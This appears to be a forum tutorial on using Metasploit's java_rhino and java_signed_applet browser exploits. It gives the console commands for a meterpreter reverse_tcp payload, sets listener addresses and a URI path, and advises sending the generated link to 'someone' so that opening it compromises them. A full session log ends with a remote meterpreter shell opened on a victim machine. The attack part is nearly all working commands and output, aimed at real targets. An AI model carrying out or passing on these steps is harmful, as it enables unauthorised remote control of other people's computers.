INTRODUCTION TO METASPLOIT PART-6 >> JAVA RHINO

Java Rhino is also known as infamous silent Java Drive by. At the beginning it was exploit you can get only by purchasing, but later it was added to metasploit as a free exploit. Okay so this needs settings similar to aurora. Let's choose java rhino.

PHP Code:

Use exploit/multi/browser/java_rhino 

Now set payload:

PHP Code:

Set Payload windows/meterpreter/reverse_tcp 

Input LPort, LHost, and SrvHost. Remember that Lhost and SrvHost should match.

PHP Code:

Set LHost 192.168.2.103
Set LPort 4444
Set SrvHost 192.168.2.103 

Also, changing UriPath is not necessary, but I'll do it anyway.

PHP Code:

Set UriPath / 

Now hit exploit and metasploit will generate a link for you. Send that link to someone, and when they open it, they will be asked to run java, but not your file as well.

Example:

Code:

II    dTb.dTb  _.---._
  II  4'  v  'B   .'"".'/|`.""'.
  II  6.  .P  :  .' / |  `.  :
  II  'T;. .;P'  '.'  /  |    `.'
  II  'T; ;P'    `. /   |    .'
II  'YvP'  `-.__|__.-'

I love shells --egypt

  =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
  =[ svn r14663 updated today (2012.01.31)

msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf  exploit(java_rhino) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(java_rhino) > set lport 4444
lport => 4444
smsf  exploit(java_rhino) > set uripath /
uripath => /
msf  exploit(java_rhino) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(java_rhino) > show options

Module options (exploit/multi/browser/java_rhino):

   Name  Current Setting  Required  Description
   ----  --  --  --
   SRVHOST  192.168.2.103    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080  yes  The local port to listen on.
   SSL  false    no  Negotiate SSL for incoming connections
   SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH  /    no  The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name  Current Setting  Required  Description
   ----  --  --  --
   EXITFUNC  process    yes  Exit technique: seh, thread, none, process
   LHOST  192.168.2.103    yes  The listen address
   LPORT  4444  yes  The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf  exploit(java_rhino) > set srvport 80
srvport => 80
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.168.2.100:50563...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012

Java Signed Applet

Java signed applet is also one of my preferred browser exploits.




Open MSFconsole and in it, type:

PHP Code:

Search signed 

This will get us exploit that we want. Type:

PHP Code:

use exploit/multi/browser/java_signed_applet 

Now let's set the payload to meterpreter.

PHP Code:

set payload windows/meterpreter/reverse_tcp 

Now simply set LHOST and uripath and you're done.

PHP Code:

set LHost 192.168.2.104
set uripath /
exploit